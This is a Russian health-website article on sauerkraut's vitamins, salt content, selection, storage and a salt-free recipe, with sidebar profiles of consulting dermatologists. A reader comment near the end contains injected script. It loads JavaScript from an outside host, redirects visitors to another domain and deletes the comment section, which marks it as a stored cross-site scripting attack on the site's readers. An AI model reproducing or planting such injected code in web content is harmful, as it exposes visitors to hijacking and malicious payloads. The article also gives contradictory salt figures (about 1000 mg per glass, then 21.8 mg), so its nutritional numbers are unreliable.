Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Продукт-«обманщик»: кваше...  >>  Продукт-«обманщик»: квашеная капуста
 
Обратная связь
 

Продукт-«обманщик»: квашеная капуста

Размер шрифта
29 декабря 2011 06:11
  • google_analytics: false
  • Нравится

Квашенная капуста богата витаминами и микроэлементами, но содержит слишком много соли, разрушающей сосуды и повышающей давление. Как правильно приготовить капусту и в чем ее хранить?

1

Достоинства

Квашеная капуста богата:

  • Витаминами С, К, витаминами группы В и витамином U (обладает противоязвенным действием)
  • Микро- и макроэлементами: натрием, калием, кальцием, фосфором, железом, серой, цинком, медью, бором, кремнием, йодом
  • Во время брожения капуста обогащается органическими кислотами (уксусная, молочная)
  • Калорийность квашенной капусты очень низкая: 25 ккал на 100 г продукта

Недостатки

  • Очень много соли: почти 1000 мг на стакан. Это 40% от рекомендуемой дневной нормы. Большое количество соли сужает сосуды, повышает давление и снижает либидо.
  • Капуста квашеная повышает аппетит.
  • Квашенная капуста – виновник отеков.
  • Это продукт брожения вызывает газообразование и обладает повышенной кислотностью
  • Из-за высокого уровня органических кислот капусту запрещено есть людям с высокой кислотностью желудочного сока, при гастрите, язвенной болезни, панкреатите, камнях в желчном пузыре.

Пьедестал почета по содержанию соли
 

  1. Огурцы маринованные – 875 мг

  2. Квашеная капуста – 21,8 мг

  3. Кабачковая икра – 5 мг

Как выбрать

  1. Старайтесь не покупать капусту из пластмассовых ведер или полиэтиленовых пакетов. Лучшая капуста — из деревянных бочек или стеклянных банок. Капуста из алюминиевой посуды может быть довольно опасна. Кислота разъедает алюминий, и в организм попадут его вредные соединения.

  2. Чем крупнее нарезана капуста, тем больше в ней витаминов.

  3. У качественного продукта будет обязательно соломенный цвет с кисловатым вкусом и запахом. Не покупайте капусту белого цвета со сладковатым вкусом, темную капусту или со слизью.

Как хранить

  • Храните капусту при температуре около нуля. При температуре ниже нуля капуста теряет вкусовые качества и содержание витамина С в ней сокращается.
  • Капуста обязательно должна быть полностью была покрыта рассолом. Оставшись без сока, капуста темнеет и теряет свои вкусовые качества. Витамин С разрушается.
  • Хранить квашеную капусту нужно в деревянных кадках. В стеклянной банке витамины сохраняются намного хуже. В эмалированной посуде они и вовсе пропадают.

Как готовить

  1. Если кочаны заквасить целыми или разрезанными пополам, витаминов сохранится в полтора раза больше.

  2. Можно положить в капусту целые или разрезанные антоновские яблоки, клюкву, бруснику, тмин, красный сладкий перец. Яблоки и ягоды улучшают вкус блюда, а перец сохранит витамин С.

  3. Перед подачей на стол промойте капусту, чтобы избавиться от лишней соли.

Рецепт квашеной капусты без соли

Для закваски возьмите капусту позеленее, черный и красный перец, сельдерей, помидоры и чеснок.
Залейте нашинкованную капусту холодной кипяченой водой и накройте марлей.
На 10 дней уберите в прохладное место для брожения.
Протыкайте время от времени деревянной палочкой.



Сюжеты по теме:
Квашеная капуста. Как она нас обманывает

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.